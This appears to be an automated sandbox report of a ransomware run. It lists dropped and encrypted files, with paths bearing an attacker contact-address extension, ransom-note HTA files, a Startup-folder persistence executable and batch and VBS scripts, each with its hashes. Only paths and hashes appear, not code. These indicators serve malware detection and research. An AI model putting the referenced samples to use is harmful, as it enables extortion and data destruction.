C:\Users\Admin\AppData\Local\Temp\1969014069\payload.dat_[[email protected]].3QC

Filesize
6.7MB

MD5
4cd7349eaca162d9dc6651d7804da082

SHA1
dc1fb70435b2a5bb934c21fc2c2b33f4e716e07d

SHA256
3e83d092087476a3662da3a6136b5da95a719f0a6c817924ac7721db9a192799

SHA512
41d39e1e6596e408cf95aa3471b584c9153013e9dfc3c0dadd28fd41472074fb35fcbcd56983093371f64425a48b03decf354751a5a3a5b263a812f922e207b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Microsoft .NET Framework 4.7.2 Setup_20240704_210223662-MSI_netfx_Full_x64.msi.txt

Filesize
12.7MB

MD5
01bec056823ddc77b6909aaa4e95560f

SHA1
854a89eb2f7b9976a0b23e61db6bdd7ff3e6fdeb

SHA256
8abd792236d9d725b5723fcc993d32880b2f49a3d7d33d6ed0aefeee9f2507dc

SHA512
62a1b188a42942f829daf52a781742ea9d855ea8c21bd6cbf0b6e34f60048c30cb9f31b63071804e69e212a5420d9210ab8c8f4963643fbb8365558b78334152

Download Submit
C:\Users\Admin\AppData\Local\Temp\Microsoft .NET Framework 4.7.2 Setup_20240704_210223662-MSI_netfx_Full_x64.msi.txt_[[email protected]].3QC

Filesize
12.7MB

MD5
07b0393a826f7105ca93c61ae6c7c767

SHA1
a899419b07c2783153c75619a36a08e1d1dfda42

SHA256
12f29329a2abeed608896b2128372b916686f3bbcb4eb3dc62d12002b59b217d

SHA512
c63437b1a78b0fd7428be474d1d6d89049dac8f2ec6153ba740fcfa847c2c054ffa6fdac482002e799eada9a1de5cd43b965486ca332354893d64c08c77fa32e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Microsoft .NET Framework 4.7.2 Setup_20240704_210223662.html_[[email protected]].3QC

Filesize
1.1MB

MD5
e288d49b46b47ddb4732fc06f2444029

SHA1
fdb141b448b14278dcbec5a71318350404b8c7c3

SHA256
8f10f611733a012d042a693c465a342dafdf20686ced026e90b463e33b5f5a84

SHA512
9e22cf83f8a3b8da781eb2607638e50c3d629f48df8164869a517577c84fd00e336c114a344ad66f700abb4df65298f9d0b5afbdd02091974121d1ddc0e30fb1

Download Submit
C:\Users\Admin\AppData\N-Save.sys

Filesize
3KB

MD5
8b0c939388ff51ce2183b41a91a9b129

SHA1
45bd43774c01555be9592f756d78af088a1d3df6

SHA256
a3e5d092b7a83292dc617a49ae90dec46814b074ad090129a53b5ea39b885f87

SHA512
6702f5fdf5c0d2ccc42f287987f0a40bb6569db9de96335779de2f3eb47e33e625d248f3fe3825fbc077591c1bcbd6eb3b222f6201a7e497fe785582254fe184

Download Submit
C:\Users\Admin\AppData\Roaming\CopyHide.sys_[[email protected]].3QC

Filesize
1.2MB

MD5
932b367d2b1378635632cb4ecafbd87e

SHA1
312af8894a3ffb8ad04ebc2bf61dbf52b894ce61

SHA256
2b2d9517a967d4660dae58c173ce498e900a673951a06199945bb9f2b3311512

SHA512
ed6ca86d74f2ad8703b17f5f7682fd35a5e6321d9575e1ba48e9d4cdfb8a012a1c807948e956c5fdc8ab74d7da4fe40b92a47b4902c81e99dc97a14270de40c8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe

Filesize
1.2MB

MD5
43cdea90bfe02953539194cc2612df96

SHA1
47028bc1510dca41b888db92f6f14d3a3c342f7a

SHA256
995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555

SHA512
2b68f4a9f6150dfe524507213e2bf974de8a1eaaa6bbde65ffce8384432732266af24abe4bd2f877e27061b6bd381a792673a55a0073737103b7d694511a9ef0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sexvjvzg.default-release\content-prefs.sqlite

Filesize
224KB

MD5
94047b3d4aec2ad7f55fec5b5f79f127

SHA1
e75ac8e21e2841530278e44d1095e193bc4f39fd

SHA256
adde39c73cddf3acd0606bf581bb80a679c6af41520cf93010ee2a145a0e209e

SHA512
1a1041d22234604f10142075bf848cbcda4d04dd8e8d78ab8da2f003aa3080ebbe4f8b82515918356044e5eb001dac4dd58d7fd6b5b0cf4137e7614197090fbb

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sexvjvzg.default-release\content-prefs.sqlite_[[email protected]].3QC

Filesize
224KB

MD5
36ace0f78547c755e86771262bd94f72

SHA1
383ea103f052d62ffae4d57dcfeae22193a837b0

SHA256
35d161302ff039f6c0e1f87dfd54c8e9e8e713f1dff0ab477fefb20c80837c34

SHA512
5b0e34abde5d119230f1001701db0624dbe41593906c2ddc5a079035e07175f6dbec2e1366ac3fc330f7311f2fbf5b198f19b32203135fb25d7c5b3e255d45b3

Download Submit
C:\Users\Admin\AppData\Roaming\UseConvert.xml_[[email protected]].3QC

Filesize
1.3MB

MD5
4ba3faccc7a24014d6e5cbc1cb74a800

SHA1
22b80cc15d4479a7d4fd48d0db2c8b165656efc4

SHA256
1353f6527bf52346d7c510ee0fe07918eaab54fc47c63eee22594fff069866e9

SHA512
77779a9617fa26e54fdf3976387fa4503be65826d3bfb787086bddcea76ae341638e41d7ced49185833d61c1202b866efeca7250a88242d23f9563fd6d4abae7

Download Submit
C:\Users\Admin\AppData\S-2153.bat

Filesize
138B

MD5
82a528cbf39b8ea7e2982e7b2305204c

SHA1
717836e0e2b304ed7ae239cc1db0f6f80e0419b1

SHA256
616738526c38e04f992b7b9fc60cb7feb3ee416bf47b69aa2c3a5f1a722a653b

SHA512
eff7654e171dbd9bc471718a7e14ee3c84a9edf948f4c8863c8107e653be8ba06bc7a2876d506d6e4ae7ef2280e820d04615ebcd88894ef01b3667d070241db3

Download Submit
C:\Users\Admin\AppData\S-6748.bat

Filesize
1KB

MD5
e13f173c022716ec4550c7503f8fa3ff

SHA1
023297f95522560a67e730c809a93e6f7dda595e

SHA256
4061ff45b9b4093fabd754148d4a2d4925edb0a5810730424dc3c083a2f20c2a

SHA512
71ad27ae5bc279b7898bf3c3a9a6e4bf1831b4c8b2513adfeeb940966bb4faa38bddbf4336277346096e8fc21e8c1a44003f2f95300608250c622b42f30d15f8

Download Submit
C:\Users\Admin\AppData\S-6748.bat

Filesize
2KB

MD5
f2db9c10904ba781ca329ef51aa85eda

SHA1
c73feba0d1faa5b4e5aba4fc7b778bd570643455

SHA256
e5dbff7f2ab2f080fb13ffe8c203856179d7eb61259d039a8dfa5f2c67819d37

SHA512
e94c29f39a7c275da9e73a68f9829ce1ef6c4ec4d61c433b14c959d3b48516c66f50e70c4cd67546159c25a5d0b248790fb0a453da27f363225e99eea14b8dcf

Download Submit
C:\Users\Admin\AppData\S-8459.vbs

Filesize
686B

MD5
ed7a274ff8ac640416952bfb5d6c927a

SHA1
6b33cd5b39db6e9a900336e446f64a137f0a0f42

SHA256
4d68e4a7a437eb4a7ad9c7b28bdda894a68ae41efba8a5e4d3a6a930bebfeea5

SHA512
8f3a4f071550afe716c5d39601cf1e8559084fbb701e95b28eb7685fed6d8a972e662ad19124a2242fd30c291b8dd1f18f1a2dcf56ac6c98f2bf96bac91510f3

Download Submit
C:\Users\Admin\Desktop\ReadMe.hta

Filesize
6KB

MD5
6c5f3404f8dafe35740db24a0b640d35

SHA1
5fc35f143733da32618d9226903d2e1acb581807

SHA256
260000469ed7803a13bcb92f7e8d0f80d3cc95cd86101f0a756d645b8479c928

SHA512
96e61dde5f92d9a01256aad38492ed74b18df82beb55661ea4ba4cd45ea3854b87e7eff3adc6c6eee25b86a7d059233e54048ebe4379ce5e85cb6b022663517a

Download Submit
C:\Users\Admin\Documents\ConnectAssert.dot_[[email protected]].3QC

Filesize
1.2MB

MD5
d6b69a92b12aba03c599e0b3211d0fb3

SHA1
0eb949572b1223efea9091a0f9ab363828276c81

SHA256
c1a8e544ef8f81607de4cd8138ae62d6d378be740c3f3534c4c3af5a46d113fe

SHA512
e5f9d929953b2974c2fba8f2fa8f504c314ad330df51c454833231a8ea7ccc3539dae01e208b18e8887b0bf7aa4cc755e2f1ef83c1151e6d47f0ac0044c1443e

Download Submit
C:\Users\Admin\Documents\ExpandRepair.pptm_[[email protected]].3QC

Filesize
1.1MB

MD5
d8afdccc5b605378ca878aa0ac5645e3

SHA1
138a4f8bf740ffa15200ad9f839a92042fe614e8

SHA256
f53036e924043d8e4d4e46722da96d7c533a11f5782589a09fcf97c764c68616

SHA512
514e51b282d5ba6339641b05a19b0f46863552e83e9a1627302cddd9ac42d6aaf091078263095044fa893040c15d7fc516fb85da5eb1a27741a00e22e1c20c23

Download Submit
C:\Users\Admin\Documents\PingOut.xlsb_[[email protected]].3QC

Filesize
1.0MB

MD5
b08f82481d842ed70b7a3faac5171191

SHA1
8621a58739dc4b06bcdc798253c8925aec9a4684

SHA256
5d855783de97122b50b3dc6592856d4530fd49e5b7cb6253be914911a221e1d8

SHA512
5778f73e0978ec511d8388f1cd5130d2b1f69da377c252ddf009a67c06671d59a1983e1b18a14ed84b59df1cead7064a4afb1c5d7e071b35935d34b271addf8e

Download Submit
C:\Users\Admin\Documents\RestartCopy.dotx_[[email protected]].3QC

Filesize
1.2MB

MD5
0e269c7010237e0900fbe53cbb5eee53

SHA1
b183ea327a150741e4ad641817e1b99bdd56004c

SHA256
2b95eebf5722bf6a9625ca77eb0996d80722109176872097968249cbacbcca34

SHA512
28ade3502a42f1ccfa09da49814433c0a16819e80770b0d80b3bc28a18751413e07cd60e078457f963f7f885d3947105947d72e8e28c343aa576c7852ad5a904

Download Submit
C:\Users\Admin\Downloads\LockGet.cab

Filesize
236KB

MD5
5a155ba6ca8a181ba9bab177ca8005b3

SHA1
fcd1eadc652c310d990e14dfa854d367a43952a3

SHA256
a78f2b84761a56cf3e167601272c56018b6c9a034ddb2d68886674521bb91959

SHA512
6f15e2227a1e824797251e61674f13a529f62a97418025a5a539c78a9e7e00daa545f67146931a41b9607967dfc49e34be869573a19504a294033904360238bd

Download Submit
C:\Users\Admin\Downloads\LockGet.cab_[[email protected]].3QC

Filesize
236KB

MD5
e3de4275a758f07177f9f9688cef8f1c

SHA1
50e4c6d7bb8a4511e7cc7e122aee819187208810

SHA256
7e5aec506003cb394838995c3495e81f74a6bfe565a91db434a49f1998f460dd

SHA512
abe7c1f0ef4b00b1091cd0b639ba22126edbaf6ccaae1df2d38b469d18f4c75c6365c29b6c769ed8201082e2c3dd72349f5310b824e9576ea85bd9b6f57e962a

Download Submit
C:\Users\Admin\Downloads\MountGet.xlt

Filesize
402KB

MD5
99684f9845eb443c35d3730b12b83e53

SHA1
eea82ac510be7655dcb6c9a5cfb3e8b5b6a896a1

SHA256
f74052e6effefa467cb32425b68ab4bf7e753b2c8d7b390d72bc2b9bf434601b

SHA512
274854c4e52b746c086d7311cbfd77c4312e5630b2d3855cbfb93cbc94509e34514ef4155f6b3a1a3160585cb5d867473d0dfc07fa3da409a0f044ab899c5ba5

Download Submit
C:\Users\Admin\Downloads\MountGet.xlt_[[email protected]].3QC

Filesize
403KB

MD5
0c6553ee58f55c2641c24357eb2bb05e

SHA1
36e92056de03eabfe89a7735b829dbcd5690c406

SHA256
8c34db22a0c3bd249eb79618bb871658ee2579407d762f794b75d92d657bca90

SHA512
396a892a3e15ebc7e503fbade83e07529acde81e33818c2f754a529c1f0b768dfd95afbd45c270a13afd0b781dbb60b773245bad9a821b19f0222abeedd8d383

Download Submit
C:\Users\Admin\Music\PingUnpublish.pptm_[[email protected]].3QC

Filesize
1.2MB

MD5
6a9fa08ee023d55731c2a607869878b1

SHA1
51e81389efddc3e49c9b1657dee9f5ad52dbf027

SHA256
efccfc147e8a1a641567441daabced81cf6a0d4d8a8c5239aeac3b2819d80f78

SHA512
b4417778650b558efed5da22929496fc134900fe0c125d13bbb3a8af1306c9e46c392d87154375d438e5c1dce681cd10158c748bd200108571da01c8d87c037e

Download Submit
C:\Users\Admin\Music\ShowTrace.pot_[[email protected]].3QC

Filesize
559KB

MD5
eebdf29d9e6d70e8933685954125a5d9

SHA1
6c5f2074707fec92c37c038274fb5eb53d015d68

SHA256
52ac57ba54975a42e82ffd1da699640cb1d9257ecd7e23b1460b7a6c19f2f412

SHA512
dbe348e244b7ffc3add857c7cfbbbb485e4ce3522c5bbf0ab24f90c6bc4413694bace52d46dce9cf1639610892fa01e35ed70032d3340880af88759d9ae94304

Download Submit
C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget

Filesize
19B

MD5
0ea4b7fb8e91fbdcf527f6aefefd9f4f

SHA1
755ee348853b327a4816776cf4b6aefa3545c1c1

SHA256
2972cc845834175baf0196f1eb2c5ddfd0b6ec3cbded21307ce926d7579f73fa

SHA512
2544a4b6311306e00cff74eb9e5b79c3708f637ff2c19a6930cbe1911b60ffb3668264ae6774c0b2773c94084e624e6a6edfb99c73a6b4b4f4243a410901782d

Download Submit
C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget_[[email protected]].3QC

Filesize
296B

MD5
a8175cbfffa69a5e591744fd31816e78

SHA1
024b27c64580666b19346f20acc083f1605ec8cf

SHA256
5790e1834bdf8274cf07ece791a5a3861a91016f0f1cff910e74975fc218b78a

SHA512
ec31d952e8ce27c174608204f9a14ed807052fd84d9ef3c346ac0f0e2c2362007a0ba48c89c759855b1a1dfe5c273c26796b8fb9cf477c1528590016d28b30e9

Download Submit
C:\Users\ReadMe.hta

Filesize
85B

MD5
253a2dc8fcb8bd7e201f98dd9c292d46

SHA1
188dc3014138a80bec3e3b4aa60596cb881692a6

SHA256
21284429e6f9f43223cf6b6c5b9142f3041b22195d6d0dd6fb5eb236ea21d400

SHA512
42df471b16b5e80546a76aae6b04d3f71461bd32c709162642fc9103f70e9f35f01dfa79933f89567fc00ce48aad0f28e48ff822ac560ec415cddf939237becb

Download Submit
C:\Windows\SysMain.sys

Filesize
417B

MD5
3969c0c0e75b3e027fb2767a4201ed4d

SHA1
316eecb4e66ddf67e629d25ecfb2cecfeb84d07b

SHA256
f3f0fe99db961659f1ea146c0e1aed131f3c61bb72ce2eb65d95cbbe7990af42

SHA512
defb2310c7246a605ce46b111bfbd6a161f65aba28bfd0e4504112573736179db215ad79c61e76b6e2656c0ae90212150802695fca7447640a8b334bc0d33c3c

Download Submit
C:\vcredist2010_x64.log-MSI_vc_red.msi.txt

Filesize
363KB

MD5
17193fcb5ad470f1d16ca6cbdc95e863

SHA1
06771666d4dcb54113b7fb8295da41277cd4abd4

SHA256
be39fff0f14607db55938d6b5c7fe09e43d83b276296ad2f1e80bee863173091

SHA512
7993fa6b494f5e1f2224d3d944944efa364f036d0c01b400a74c41c1eb689ce568c27ee4ec3bfda277646eece7d719a70a02e08b1ed437b959c7531d0d6f04de

Download Submit
memory/7328-103301-0x00000000001F0000-0x0000000000206000-memory.dmp

Filesize
88KB

Download
memory/7328-103300-0x00000000001F0000-0x0000000000206000-memory.dmp

Filesize
88KB

Download